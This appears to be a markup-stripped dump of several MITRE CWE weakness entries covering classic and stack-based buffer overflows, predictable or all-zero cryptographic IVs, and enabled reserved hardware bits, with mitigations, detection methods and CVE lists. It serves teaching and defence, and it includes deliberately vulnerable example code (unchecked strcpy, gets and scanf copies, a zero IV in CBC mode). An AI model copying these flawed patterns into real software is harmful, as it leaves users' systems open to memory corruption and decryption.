Custom Error Handling + + + + The product copies an input buffer to an output buffer without verifying that the size of the input buffer is less than the size of the output buffer, leading to a buffer overflow. + A buffer overflow condition exists when a product attempts to put more data in a buffer than it can hold, or when it attempts to put data in a memory area outside of the boundaries of a buffer. The simplest type of error, and the most common cause of buffer overflows, is the "classic" case in which the product copies the buffer without restricting how much is copied. Other variants exist, but the existence of a classic overflow strongly suggests that the programmer is not considering even the most basic of security protections. + + + + + + + + + + + Resultant + + + Primary + + + + + + + + + + Classic Buffer Overflow + This term was frequently used by vulnerability researchers during approximately 1995 to 2005 to differentiate buffer copies without length checks (which had been known about for decades) from other emerging weaknesses that still involved invalid accesses of buffers, as vulnerability researchers began to develop advanced exploitation techniques. + + + Unbounded Transfer + + + + + Implementation + + + High + + + Integrity + Confidentiality + Availability + Modify Memory + Execute Unauthorized Code or Commands + Buffer overflows often can be used to execute arbitrary code, which is usually outside the scope of the product's implicit security policy. This can often be used to subvert any other security service. + + + Availability + Modify Memory + DoS: Crash, Exit, or Restart + DoS: Resource Consumption (CPU) + Buffer overflows generally lead to crashes. Other attacks leading to lack of availability are possible, including putting the product into an infinite loop. + + + + + Automated Static Analysis + + This weakness can often be detected using automated static analysis tools. Many modern tools use data flow analysis or constraint-based techniques to minimize the number of false positives. + Automated static analysis generally does not account for environmental considerations when reporting out-of-bounds memory operations. This can make it difficult for users to determine which warnings should be investigated first. For example, an analysis tool might report buffer overflows that originate from command line arguments in a program that is not expected to run with setuid or other special privileges. + + High + Detection techniques for buffer-related errors are more mature than for most other weakness types. + + + Automated Dynamic Analysis + This weakness can be detected using dynamic tools and techniques that interact with the software using large test suites with many diverse inputs, such as fuzz testing (fuzzing), robustness testing, and fault injection. The software's operation may slow down, but it should not become unstable, crash, or generate incorrect results. + + + Manual Analysis + Manual analysis can be useful for finding this weakness, but it might not achieve desired code coverage within limited time constraints. This becomes difficult for weaknesses that must be considered for all inputs, since the attack surface can be too large. + + + Automated Static Analysis - Binary or Bytecode + + According to SOAR, the following detection techniques may be useful: + + Highly cost effective: + + Bytecode Weakness Analysis - including disassembler + source code weakness analysis + Binary Weakness Analysis - including disassembler + source code weakness analysis + + + + High + + + Manual Static Analysis - Binary or Bytecode + + According to SOAR, the following detection techniques may be useful: + + Cost effective for partial coverage: + + Binary / Bytecode disassembler - then use manual analysis for vulnerabilities & anomalies + + + + SOAR Partial + + + Dynamic Analysis with Automated Results Interpretation + + According to SOAR, the following detection techniques may be useful: + + Cost effective for partial coverage: + + Web Application Scanner + Web Services Scanner + Database Scanners + + + + SOAR Partial + + + Dynamic Analysis with Manual Results Interpretation + + According to SOAR, the following detection techniques may be useful: + + Cost effective for partial coverage: + + Fuzz Tester + Framework-based Fuzzer + + + + SOAR Partial + + + Manual Static Analysis - Source Code + + According to SOAR, the following detection techniques may be useful: + + Cost effective for partial coverage: + + Focused Manual Spotcheck - Focused manual analysis of source + Manual Source Code Review (not inspections) + + + + SOAR Partial + + + Automated Static Analysis - Source Code + + According to SOAR, the following detection techniques may be useful: + + Highly cost effective: + + Source code Weakness Analyzer + Context-configured Source Code Weakness Analyzer + + + + High + + + Architecture or Design Review + + According to SOAR, the following detection techniques may be useful: + + Highly cost effective: + + Formal Methods / Correct-By-Construction + + Cost effective for partial coverage: + + Inspection (IEEE 1028 standard) (can apply to requirements, design, source code, etc.) + + + + High + + + + + Requirements + Language Selection + + Use a language that does not allow this weakness to occur or provides constructs that make this weakness easier to avoid. + For example, many languages that perform their own memory management, such as Java and Perl, are not subject to buffer overflows. Other languages, such as Ada and C#, typically provide overflow protection, but the protection can be disabled by the programmer. + Be wary that a language's interface to native code may still be subject to overflows, even if the language itself is theoretically safe. + + + + Architecture and Design + Libraries or Frameworks + + Use a vetted library or framework that does not allow this weakness to occur or provides constructs that make this weakness easier to avoid. + Examples include the Safe C String Library (SafeStr) by Messier and Viega [REF-57], and the Strsafe.h library from Microsoft [REF-56]. These libraries provide safer versions of overflow-prone string-handling functions. + + This is not a complete solution, since many buffer overflows are not related to strings. + + + Operation + Build and Compilation + Environment Hardening + + Use automatic buffer overflow detection mechanisms that are offered by certain compilers or compiler extensions. Examples include: the Microsoft Visual Studio /GS flag, Fedora/Red Hat FORTIFY_SOURCE GCC flag, StackGuard, and ProPolice, which provide various mechanisms including canary-based detection and range/index checking. + D3-SFCV (Stack Frame Canary Validation) from D3FEND [REF-1334] discusses canary-based detection in detail. + + + Defense in Depth + + This is not necessarily a complete solution, since these mechanisms only detect certain types of overflows. In addition, the result is still a denial of service, since the typical response is to exit the application. + + + + Implementation + + Consider adhering to the following rules when allocating and managing an application's memory: + + Double check that your buffer is as large as you specify. + When using functions that accept a number of bytes to copy, such as strncpy(), be aware that if the destination buffer size is equal to the source buffer size, it may not NULL-terminate the string. + Check buffer boundaries if accessing the buffer in a loop and make sure there is no danger of writing past the allocated space. + If necessary, truncate all input strings to a reasonable length before passing them to the copy and concatenation functions. + + + + + Implementation + Input Validation + + Assume all input is malicious. Use an "accept known good" input validation strategy, i.e., use a list of acceptable inputs that strictly conform to specifications. Reject any input that does not strictly conform to specifications, or transform it into something that does. + When performing input validation, consider all potentially relevant properties, including length, type of input, the full range of acceptable values, missing or extra inputs, syntax, consistency across related fields, and conformance to business rules. As an example of business rule logic, "boat" may be syntactically valid because it only contains alphanumeric characters, but it is not valid if the input is only expected to contain colors such as "red" or "blue." + Do not rely exclusively on looking for malicious or malformed inputs. This is likely to miss at least one undesirable input, especially if the code's environment changes. This can give attackers enough room to bypass the intended validation. However, denylists can be useful for detecting potential attacks or determining which inputs are so malformed that they should be rejected outright. + + + + Architecture and Design + For any security checks that are performed on the client side, ensure that these checks are duplicated on the server side, in order to avoid CWE-602. Attackers can bypass the client-side checks by modifying values after the checks have been performed, or by changing the client to remove the client-side checks entirely. Then, these modified values would be submitted to the server. + + + Operation + Build and Compilation + Environment Hardening + + Run or compile the software using features or extensions that randomly arrange the positions of a program's executable and libraries in memory. Because this makes the addresses unpredictable, it can prevent an attacker from reliably jumping to exploitable code. + Examples include Address Space Layout Randomization (ASLR) [REF-58] [REF-60] and Position-Independent Executables (PIE) [REF-64]. Imported modules may be similarly realigned if their default memory addresses conflict with other modules, in a process known as "rebasing" (for Windows) and "prelinking" (for Linux) [REF-1332] using randomly generated addresses. ASLR for libraries cannot be used in conjunction with prelink since it would require relocating the libraries at run-time, defeating the whole purpose of prelinking. + For more information on these techniques see D3-SAOR (Segment Address Offset Randomization) from D3FEND [REF-1335]. + + Defense in Depth + These techniques do not provide a complete solution. For instance, exploits frequently use a bug that discloses memory addresses in order to maximize reliability of code execution [REF-1337]. It has also been shown that a side-channel attack can bypass ASLR [REF-1333] + + + + Operation + Environment Hardening + + Use a CPU and operating system that offers Data Execution Protection (using hardware NX or XD bits) or the equivalent techniques that simulate this feature in software, such as PaX [REF-60] [REF-61]. These techniques ensure that any instruction executed is exclusively at a memory address that is part of the code segment. + For more information on these techniques see D3-PSEP (Process Segment Execution Prevention) from D3FEND [REF-1336]. + + Defense in Depth + This is not a complete solution, since buffer overflows could be used to overwrite nearby variables to modify the software's state in dangerous ways. In addition, it cannot be used in cases in which self-modifying code is required. Finally, an attack could still cause a denial of service, since the typical response is to exit the application. + + + Build and Compilation + Operation + Most mitigating technologies at the compiler or OS level to date address only a subset of buffer overflow problems and rarely provide complete protection against even that subset. It is good practice to implement strategies to increase the workload of an attacker, such as leaving the attacker to guess an unknown value that changes every program execution. + + + Implementation + Replace unbounded copy functions with analogous functions that support length arguments, such as strcpy with strncpy. Create these if they are not available. + Moderate + This approach is still susceptible to calculation errors, including issues such as off-by-one errors (CWE-193) and incorrectly calculating buffer lengths (CWE-131). + + + Architecture and Design + Enforcement by Conversion + When the set of acceptable objects, such as filenames or URLs, is limited or known, create a mapping from a set of fixed input values (such as numeric IDs) to the actual filenames or URLs, and reject all other inputs. + + + Architecture and Design + Operation + Environment Hardening + Run your code using the lowest privileges that are required to accomplish the necessary tasks [REF-76]. If possible, create isolated accounts with limited privileges that are only used for a single task. That way, a successful attack will not immediately give the attacker access to the rest of the software or its environment. For example, database applications rarely need to run as the database administrator, especially in day-to-day operations. + + + Architecture and Design + Operation + Sandbox or Jail + + Run the code in a "jail" or similar sandbox environment that enforces strict boundaries between the process and the operating system. This may effectively restrict which files can be accessed in a particular directory or which commands can be executed by the software. + OS-level examples include the Unix chroot jail, AppArmor, and SELinux. In general, managed code may provide some protection. For example, java.io.FilePermission in the Java SecurityManager allows the software to specify restrictions on file operations. + This may not be a feasible solution, and it only limits the impact to the operating system; the rest of the application may still be subject to compromise. + Be careful to avoid CWE-243 and other weaknesses related to jails. + + Limited + The effectiveness of this mitigation depends on the prevention capabilities of the specific sandbox or jail being used and might only help to reduce the scope of an attack, such as restricting the attacker to certain system calls or limiting the portion of the file system that can be accessed. + + + + + The following code asks the user to enter their last name and then attempts to store the value entered in the last_name array. + + char last_name[20];printf ("Enter your last name: ");scanf ("%s", last_name); + + The problem with the code above is that it does not restrict or limit the size of the name entered by the user. If the user enters "Very_very_long_last_name" which is 24 characters long, then a buffer overflow will occur since the array can only hold 20 characters total. + + + The following code attempts to create a local copy of a buffer to perform some manipulations to the data. + + void manipulate_string(char * string){char buf[24];strcpy(buf, string);...} + + However, the programmer does not ensure that the size of the data pointed to by string will fit in the local buffer and copies the data with the potentially dangerous strcpy() function. This may result in a buffer overflow condition if an attacker can influence the contents of the string parameter. + + + The code below calls the gets() function to read in data from the command line. + + + char buf[24];printf("Please enter your name and press <Enter>\n");gets(buf);...} + + However, gets() is inherently unsafe, because it copies all input from STDIN to the buffer without checking size. This allows the user to provide a string that is larger than the buffer size, resulting in an overflow condition. + + + In the following example, a server accepts connections from a client and processes the client request. After accepting a client connection, the program will obtain client information using the gethostbyaddr method, copy the hostname of the client that connected to a local variable and output the hostname of the client to a log file. + + ... + struct hostent *clienthp;char hostname[MAX_LEN]; + // create server socket, bind to server address and listen on socket... + // accept client connections and process requestsint count = 0;for (count = 0; count < MAX_CONNECTIONS; count++) { + + int clientlen = sizeof(struct sockaddr_in);int clientsocket = accept(serversocket, (struct sockaddr *)&clientaddr, &clientlen); + if (clientsocket >= 0) { + clienthp = gethostbyaddr((char*) &clientaddr.sin_addr.s_addr, sizeof(clientaddr.sin_addr.s_addr), AF_INET);strcpy(hostname, clienthp->h_name);logOutput("Accepted client connection from host ", hostname); + // process client request...close(clientsocket); + } + }close(serversocket); + + ... + + However, the hostname of the client that connected may be longer than the allocated size for the local hostname variable. This will result in a buffer overflow when copying the client hostname to the local variable using the strcpy method. + + + + + CVE-2000-1094 + buffer overflow using command with long argument + https://www.cve.org/CVERecord?id=CVE-2000-1094 + + + CVE-1999-0046 + buffer overflow in local program using long environment variable + https://www.cve.org/CVERecord?id=CVE-1999-0046 + + + CVE-2002-1337 + buffer overflow in comment characters, when product increments a counter for a ">" but does not decrement for "<" + https://www.cve.org/CVERecord?id=CVE-2002-1337 + + + CVE-2003-0595 + By replacing a valid cookie value with an extremely long string of characters, an attacker may overflow the application's buffers. + https://www.cve.org/CVERecord?id=CVE-2003-0595 + + + CVE-2001-0191 + By replacing a valid cookie value with an extremely long string of characters, an attacker may overflow the application's buffers. + https://www.cve.org/CVERecord?id=CVE-2001-0191 + + + + Memory Management + + + Memory + + + + Unbounded Transfer ('classic overflow') + + + Buffer Overflow + + + Buffer overflow + + + A1 + Unvalidated Input + CWE More Specific + + + A5 + Buffer Overflows + CWE More Specific + + + STR31-C + Guarantee that storage for strings has sufficient space for character data and the null terminator + Exact + + + 7 + Buffer Overflow + + + SFP8 + Faulty Buffer Access + + + ASCSM-CWE-120 + + + ASCRM-CWE-120 + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + Allowed-with-Review + There are some indications that this CWE ID might be misused and selected simply because it mentions "buffer overflow" - an increasingly vague term. This CWE entry is only appropriate for "Buffer Copy" operations (not buffer reads), in which where there is no "Checking [the] Size of Input", and (by implication of the copy) writing past the end of the buffer. + If the vulnerability being analyzed involves out-of-bounds reads, then consider CWE-125 or descendants. For root cause analysis: if there is any input validation, consider children of CWE-20 such as CWE-1284. If there is a calculation error for buffer sizes, consider CWE-131 or similar. + + + + + + At the code level, stack-based and heap-based overflows do not differ significantly, so there usually is not a need to distinguish them. From the attacker perspective, they can be quite different, since different techniques are required to exploit them. + Many issues that are now called "buffer overflows" are substantively different than the "classic" overflow, including entirely different bug types that rely on overflow exploit techniques, such as integer signedness errors, integer overflows, and format string bugs. This imprecise terminology can make it difficult to determine which variant is being reported. + + + + PLOVER + 2006-07-19 + Draft 3 + 2006-07-19 + + + Eric Dalci + Cigital + 2008-07-01 + updated Time_of_Introduction + + + KDM Analytics + 2008-08-01 + added/updated white box definitions + + + Veracode + 2008-08-15 + Suggested OWASP Top Ten 2004 mapping + + + CWE Content Team + MITRE + 2008-09-08 + updated Alternate_Terms, Applicable_Platforms, Common_Consequences, Relationships, Observed_Example, Other_Notes, Taxonomy_Mappings, Weakness_Ordinalities + + + CWE Content Team + MITRE + 2008-10-10 + Changed name and description to more clearly emphasize the "classic" nature of the overflow. + + + CWE Content Team + MITRE + 2008-10-14 + updated Alternate_Terms, Description, Name, Other_Notes, Terminology_Notes + + + CWE Content Team + MITRE + 2008-11-24 + updated Other_Notes, Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2009-01-12 + updated Common_Consequences, Other_Notes, Potential_Mitigations, References, Relationship_Notes, Relationships + + + CWE Content Team + MITRE + 2009-07-27 + updated Other_Notes, Potential_Mitigations, Relationships + + + CWE Content Team + MITRE + 2009-10-29 + updated Common_Consequences, Relationships + + + CWE Content Team + MITRE + 2010-02-16 + updated Applicable_Platforms, Common_Consequences, Demonstrative_Examples, Detection_Factors, Potential_Mitigations, References, Related_Attack_Patterns, Relationships, Taxonomy_Mappings, Time_of_Introduction, Type + + + CWE Content Team + MITRE + 2010-04-05 + updated Demonstrative_Examples, Related_Attack_Patterns + + + CWE Content Team + MITRE + 2010-06-21 + updated Common_Consequences, Potential_Mitigations, References + + + CWE Content Team + MITRE + 2010-09-27 + updated Potential_Mitigations + + + CWE Content Team + MITRE + 2010-12-13 + updated Potential_Mitigations + + + CWE Content Team + MITRE + 2011-03-29 + updated Demonstrative_Examples, Description + + + CWE Content Team + MITRE + 2011-06-01 + updated Common_Consequences + + + CWE Content Team + MITRE + 2011-06-27 + updated Relationships + + + CWE Content Team + MITRE + 2011-09-13 + updated Potential_Mitigations, References, Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2012-05-11 + updated References, Relationships + + + CWE Content Team + MITRE + 2012-10-30 + updated Potential_Mitigations + + + CWE Content Team + MITRE + 2014-02-18 + updated Potential_Mitigations, References + + + CWE Content Team + MITRE + 2014-07-30 + updated Detection_Factors, Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2017-11-08 + updated Applicable_Platforms, Causal_Nature, Demonstrative_Examples, Likelihood_of_Exploit, References, Relationships, Taxonomy_Mappings, White_Box_Definitions + + + CWE Content Team + MITRE + 2018-03-27 + updated References + + + CWE Content Team + MITRE + 2019-01-03 + updated References, Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2019-06-20 + updated Relationships + + + CWE Content Team + MITRE + 2020-02-24 + updated Potential_Mitigations, Relationships + + + CWE Content Team + MITRE + 2020-06-25 + updated Common_Consequences, Potential_Mitigations + + + CWE Content Team + MITRE + 2020-08-20 + updated Alternate_Terms, Relationships + + + CWE Content Team + MITRE + 2020-12-10 + updated Demonstrative_Examples, Relationships + + + CWE Content Team + MITRE + 2021-03-15 + updated Demonstrative_Examples + + + CWE Content Team + MITRE + 2021-07-20 + updated Potential_Mitigations + + + CWE Content Team + MITRE + 2022-10-13 + updated References + + + CWE Content Team + MITRE + 2023-01-31 + updated Common_Consequences, Description + + + CWE Content Team + MITRE + 2023-04-27 + updated Potential_Mitigations, References, Relationships + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + Unbounded Transfer ('Classic Buffer Overflow') + + + + The product uses a cryptographic primitive that uses an Initialization + Vector (IV), but the product does not generate IVs that are + sufficiently unpredictable or unique according to the expected + cryptographic requirements for that primitive. + + + By design, some cryptographic primitives + (such as block ciphers) require that IVs + must have certain properties for the + uniqueness and/or unpredictability of an + IV. Primitives may vary in how important + these properties are. If these properties + are not maintained, e.g. by a bug in the + code, then the cryptography may be weakened + or broken by attacking the IVs themselves. + + + + + + + + + + Implementation + + + + + Confidentiality + Read Application Data + If the IV is not properly initialized, data that is encrypted can be compromised and information about the data can be leaked. See [REF-1179]. + + + + + Implementation + Different cipher + modes have different requirements for + their IVs. When choosing and implementing + a mode, it is important to understand + those requirements in order to keep + security guarantees intact. Generally, it + is safest to generate a random IV, since + it will be both unpredictable and have a + very low chance of being non-unique. IVs + do not have to be kept secret, so if + generating duplicate IVs is a concern, a + list of already-used IVs can be kept and + checked against. + + + NIST offers recommendations on generation of IVs for modes of which they have approved. These include options for when random IVs are not practical. For CBC, CFB, and OFB, see [REF-1175]; for GCM, see [REF-1178]. + + + + + + + In the following examples, CBC mode is used when encrypting data: + + EVP_CIPHER_CTX ctx;char key[EVP_MAX_KEY_LENGTH];char iv[EVP_MAX_IV_LENGTH];RAND_bytes(key, b);memset(iv,0,EVP_MAX_IV_LENGTH);EVP_EncryptInit(&ctx,EVP_bf_cbc(), key,iv); + + + public class SymmetricCipherTest { + public static void main() { + + byte[] text ="Secret".getBytes();byte[] iv ={0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00};KeyGenerator kg = KeyGenerator.getInstance("DES");kg.init(56);SecretKey key = kg.generateKey();Cipher cipher = Cipher.getInstance("DES/CBC/PKCS5Padding");IvParameterSpec ips = new IvParameterSpec(iv);cipher.init(Cipher.ENCRYPT_MODE, key, ips);return cipher.doFinal(inpBytes); + } + } + + In both of these examples, the initialization vector (IV) is always a block of zeros. This makes the resulting cipher text much more predictable and susceptible to a dictionary attack. + + + + The Wired Equivalent Privacy (WEP) protocol used in the 802.11 + wireless standard only supported 40-bit keys, and the IVs were only 24 + bits, increasing the chances that the same IV would be reused for + multiple messages. The IV was included in plaintext as part of the packet, making + it directly observable to attackers. Only 5000 messages are needed + before a collision occurs due to the "birthday paradox" [REF-1176]. Some + implementations would reuse the same IV for each packet. This IV reuse + made it much easier for attackers to recover plaintext from + two packets with the same IV, using well-understood attacks, + especially if the plaintext was known for one of the packets [REF-1175]. + + + + + + CVE-2020-1472 + ZeroLogon vulnerability - use of a static IV of all zeroes in AES-CFB8 mode + https://www.cve.org/CVERecord?id=CVE-2020-1472 + + + CVE-2011-3389 + BEAST attack in SSL 3.0 / TLS 1.0. In CBC mode, chained initialization vectors are non-random, allowing decryption of HTTPS traffic using a chosen plaintext attack. + https://www.cve.org/CVERecord?id=CVE-2011-3389 + + + CVE-2001-0161 + wireless router does not use 6 of the 24 bits for WEP encryption, making it easier for attackers to decrypt traffic + https://www.cve.org/CVERecord?id=CVE-2001-0161 + + + CVE-2001-0160 + WEP card generates predictable IV values, making it easier for attackers to decrypt traffic + https://www.cve.org/CVERecord?id=CVE-2001-0160 + + + CVE-2017-3225 + device bootloader uses a zero initialization vector during AES-CBC + https://www.cve.org/CVERecord?id=CVE-2017-3225 + + + CVE-2016-6485 + crypto framework uses PHP rand function - which is not cryptographically secure - for an initialization vector + https://www.cve.org/CVERecord?id=CVE-2016-6485 + + + CVE-2014-5386 + encryption routine does not seed the random number generator, causing the same initialization vector to be generated repeatedly + https://www.cve.org/CVERecord?id=CVE-2014-5386 + + + CVE-2020-5408 + encryption functionality in an authentication framework uses a fixed null IV with CBC mode, allowing attackers to decrypt traffic in applications that use this functionality + https://www.cve.org/CVERecord?id=CVE-2020-5408 + + + CVE-2017-17704 + messages for a door-unlocking product use a fixed IV in CBC mode, which is the same after each restart + https://www.cve.org/CVERecord?id=CVE-2017-17704 + + + CVE-2017-11133 + application uses AES in CBC mode, but the pseudo-random secret and IV are generated using math.random, which is not cryptographically strong. + https://www.cve.org/CVERecord?id=CVE-2017-11133 + + + CVE-2007-3528 + Blowfish-CBC implementation constructs an IV where each byte is calculated modulo 8 instead of modulo 256, resulting in less than 12 bits for the effective IV length, and less than 4096 possible IV values. + https://www.cve.org/CVERecord?id=CVE-2007-3528 + + + + Cryptography + + + + + + + + + + + + + + + Allowed + This CWE entry is at the Base level of abstraction, which is a preferred level of abstraction for mapping to the root causes of vulnerabilities. + Carefully read both the name and description to ensure that this mapping is an appropriate fit. Do not try to 'force' a mapping to a lower-level Base/Variant simply to comply with this preferred level of abstraction. + + + + + + As of CWE 4.5, terminology related to randomness, entropy, and + predictability can vary widely. Within the developer and other + communities, "randomness" is used heavily. However, within + cryptography, "entropy" is distinct, typically implied as a + measurement. There are no commonly-used definitions, even within + standards documents and cryptography papers. Future versions of + CWE will attempt to define these terms and, if necessary, + distinguish between them in ways that are appropriate for + different communities but do not reduce the usability of CWE for + mapping, understanding, or other scenarios. + + + + CWE Content Team + MITRE + 2021-03-09 + 4.4 + 2021-03-15 + + + CWE Content Team + MITRE + 2021-07-20 + updated Maintenance_Notes, Observed_Examples, References + + + CWE Content Team + MITRE + 2023-04-27 + updated References, Relationships, Time_of_Introduction + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + + + + The reserved bits in a hardware design are not disabled prior to production. Typically, reserved bits are used for future capabilities and should not support any functional logic in the design. However, designers might covertly use these bits to debug or further develop new capabilities in production hardware. Adversaries with access to these bits will write to them in hopes of compromising hardware state. + + Reserved bits are labeled as such so they can be allocated for a later purpose. They are not to do anything in the current design. However, designers might want to use these bits to debug or control/configure a future capability to help minimize time to market (TTM). If the logic being controlled by these bits is still enabled in production, an adversary could use the logic to induce unwanted/unsupported behavior in the hardware. + + + + + + + + + + + + + Architecture and Design + The Designer and Implementer have to make a conscious choice to do this + + + Implementation + The Designer and Implementer have to make a conscious choice to do this + + + Documentation + If documentation labels anything "for future use", "reserved", or the like, such labeling could indicate to an attacker a potential attack point + + + + + Confidentiality + Integrity + Availability + Access Control + Accountability + Authentication + Authorization + Non-Repudiation + Varies by Context + This type of weakness all depends on the capabilities of the logic being controlled or configured by the reserved bits + + + + + Architecture and Design + Implementation + + Include a feature to disable reserved bits. + + + + Integration + + Any writes to these reserve bits are blocked (e.g., ignored, access-protected, etc.), or an exception can be asserted. + + + + + + Assume a hardware Intellectual Property (IP) has address space 0x0-0x0F for its configuration registers, with the last one labeled reserved (i.e. 0x0F). Therefore inside the Finite State Machine (FSM), the code is as follows: + + reg gpio_out = 0; //gpio should remain low for normal operation + + case (register_address) + + 4'b1111 : //0x0F + + begin + + gpio_out = 1; + + end + + + + + An adversary may perform writes to reserved address space in hopes of changing the behavior of the hardware. In the code above, the GPIO pin should remain low for normal operation. However, it can be asserted by accessing the reserved address space (0x0F). This may be a concern if the GPIO state is being used as an indicator of health (e.g. if asserted the hardware may respond by shutting down or resetting the system, which may not be the correct action the system should perform). + In the code below, the condition "register_address = 0X0F" is commented out, and a default is provided that will catch any values of register_address not explicitly accounted for and take no action with regards to gpio_out. This means that an attacker who is able to write 0X0F to register_address will not enable any undocumented "features" in the process. + + + reg gpio_out = 0; //gpio should remain low for normal operation + + case (register_address) + + //4'b1111 : //0x0F + default: gpio_out = gpio_out; + + + + + + + + + Allowed + This CWE entry is at the Base level of abstraction, which is a preferred level of abstraction for mapping to the root causes of vulnerabilities. + Carefully read both the name and description to ensure that this mapping is an appropriate fit. Do not try to 'force' a mapping to a lower-level Base/Variant simply to comply with this preferred level of abstraction. + + + + + + + Brent Sherman + Intel Corporation + 2020-02-06 + 4.0 + 2020-02-24 + + + CWE Content Team + MITRE + 2020-08-20 + updated Related_Attack_Patterns + + + CWE Content Team + MITRE + 2021-10-28 + updated Potential_Mitigations + + + CWE Content Team + MITRE + 2022-10-13 + updated Demonstrative_Examples + + + CWE Content Team + MITRE + 2023-01-31 + updated Demonstrative_Examples + + + CWE Content Team + MITRE + 2023-04-27 + updated Relationships + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + + + + A stack-based buffer overflow condition is a condition where the buffer being overwritten is allocated on the stack (i.e., is a local variable or, rarely, a parameter to a function). + + + + + + + Primary + + + + + + + + There are generally several security-critical data on an execution stack that can lead to arbitrary code execution. The most prominent is the stored return address, the memory address at which execution should continue once the current function is finished executing. The attacker can overwrite this value with some memory address to which the attacker also has write access, into which they place arbitrary code to be run with the full privileges of the vulnerable program. Alternately, the attacker can supply the address of an important call, for instance the POSIX system() call, leaving arguments to the call on the stack. This is often called a return into libc exploit, since the attacker generally forces the program to jump at return time into an interesting routine in the C standard library (libc). Other important data commonly on the stack include the stack pointer and frame pointer, two values that indicate offsets for computing memory addresses. Modifying those values can often be leveraged into a "write-what-where" condition. + + + + Stack Overflow + "Stack Overflow" is often used to mean the same thing as stack-based buffer overflow, however it is also used on occasion to mean stack exhaustion, usually a result from an excessively recursive function call. Due to the ambiguity of the term, use of stack overflow to describe either circumstance is discouraged. + + + + + Implementation + + + High + + + Availability + Modify Memory + DoS: Crash, Exit, or Restart + DoS: Resource Consumption (CPU) + DoS: Resource Consumption (Memory) + Buffer overflows generally lead to crashes. Other attacks leading to lack of availability are possible, including putting the program into an infinite loop. + + + Integrity + Confidentiality + Availability + Access Control + Modify Memory + Execute Unauthorized Code or Commands + Bypass Protection Mechanism + Buffer overflows often can be used to execute arbitrary code, which is usually outside the scope of a program's implicit security policy. + + + Integrity + Confidentiality + Availability + Access Control + Other + Modify Memory + Execute Unauthorized Code or Commands + Bypass Protection Mechanism + Other + When the consequence is arbitrary code execution, this can often be used to subvert any other security service. + + + + + Fuzzing + Fuzz testing (fuzzing) is a powerful technique for generating large numbers of diverse inputs - either randomly or algorithmically - and dynamically invoking the code with those inputs. Even with random inputs, it is often capable of generating unexpected results such as crashes, memory corruption, or resource consumption. Fuzzing effectively produces repeatable test cases that clearly indicate bugs, which helps developers to diagnose the issues. + High + + + Automated Static Analysis + Automated static analysis, commonly referred to as Static Application Security Testing (SAST), can find some instances of this weakness by analyzing source code (or binary/compiled code) without having to execute it. Typically, this is done by building a model of data flow and control flow, then searching for potentially-vulnerable patterns that connect "sources" (origins of input) with "sinks" (destinations where the data interacts with external components, a lower layer such as the OS, etc.) + High + + + + + Operation + Build and Compilation + Environment Hardening + + Use automatic buffer overflow detection mechanisms that are offered by certain compilers or compiler extensions. Examples include: the Microsoft Visual Studio /GS flag, Fedora/Red Hat FORTIFY_SOURCE GCC flag, StackGuard, and ProPolice, which provide various mechanisms including canary-based detection and range/index checking. + D3-SFCV (Stack Frame Canary Validation) from D3FEND [REF-1334] discusses canary-based detection in detail. + + Defense in Depth + + This is not necessarily a complete solution, since these mechanisms only detect certain types of overflows. In addition, the result is still a denial of service, since the typical response is to exit the application. + + + + Architecture and Design + Use an abstraction library to abstract away risky APIs. Not a complete solution. + + + Implementation + Implement and perform bounds checking on input. + + + Implementation + Do not use dangerous functions such as gets. Use safer, equivalent functions which check for boundary errors. + + + Operation + Build and Compilation + Environment Hardening + + Run or compile the software using features or extensions that randomly arrange the positions of a program's executable and libraries in memory. Because this makes the addresses unpredictable, it can prevent an attacker from reliably jumping to exploitable code. + Examples include Address Space Layout Randomization (ASLR) [REF-58] [REF-60] and Position-Independent Executables (PIE) [REF-64]. Imported modules may be similarly realigned if their default memory addresses conflict with other modules, in a process known as "rebasing" (for Windows) and "prelinking" (for Linux) [REF-1332] using randomly generated addresses. ASLR for libraries cannot be used in conjunction with prelink since it would require relocating the libraries at run-time, defeating the whole purpose of prelinking. + For more information on these techniques see D3-SAOR (Segment Address Offset Randomization) from D3FEND [REF-1335]. + Defense in Depth + These techniques do not provide a complete solution. For instance, exploits frequently use a bug that discloses memory addresses in order to maximize reliability of code execution [REF-1337]. It has also been shown that a side-channel attack can bypass ASLR [REF-1333] + + + + + While buffer overflow examples can be rather complex, it is possible to have very simple, yet still exploitable, stack-based buffer overflows: + + #define BUFSIZE 256int main(int argc, char **argv) {char buf[BUFSIZE];strcpy(buf, argv[1]);} + + The buffer size is fixed, but there is no guarantee the string in argv[1] will not exceed this size and cause an overflow. + + + This example takes an IP address from a user, verifies that it is well formed and then looks up the hostname and copies it into a buffer. + + void host_lookup(char *user_supplied_addr){ + struct hostent *hp;in_addr_t *addr;char hostname[64];in_addr_t inet_addr(const char *cp); + + /*routine that ensures user_supplied_addr is in the right format for conversion */ + + validate_addr_form(user_supplied_addr);addr = inet_addr(user_supplied_addr);hp = gethostbyaddr( addr, sizeof(struct in_addr), AF_INET);strcpy(hostname, hp->h_name); + } + + This function allocates a buffer of 64 bytes to store the hostname, however there is no guarantee that the hostname will not be larger than 64 bytes. If an attacker specifies an address which resolves to a very large hostname, then the function may overwrite sensitive data or even relinquish control flow to the attacker. + Note that this example also contains an unchecked return value (CWE-252) that can lead to a NULL pointer dereference (CWE-476). + + + + + CVE-2021-35395 + Stack-based buffer overflows in SFK for wifi chipset used for IoT/embedded devices, as exploited in the wild per CISA KEV. + https://www.cve.org/CVERecord?id=CVE-2021-35395 + + + + + Stack overflow + + + SFP8 + Faulty Buffer Access + + + ARR38-C + Guarantee that library functions do not form invalid pointers + Imprecise + + + STR31-C + Guarantee that storage for strings has sufficient space for character data and the null terminator + CWE More Specific + + + + + + + + + + + + + + + + + + + + Allowed + This CWE entry is at the Variant level of abstraction, which is a preferred level of abstraction for mapping to the root causes of vulnerabilities. + Carefully read both the name and description to ensure that this mapping is an appropriate fit. Do not try to 'force' a mapping to a lower-level Base/Variant simply to comply with this preferred level of abstraction. + + + + + + Stack-based buffer overflows can instantiate in return address overwrites, stack pointer overwrites or frame pointer overwrites. They can also be considered function pointer overwrites, array indexer overwrites or write-what-where condition, etc. + + + + 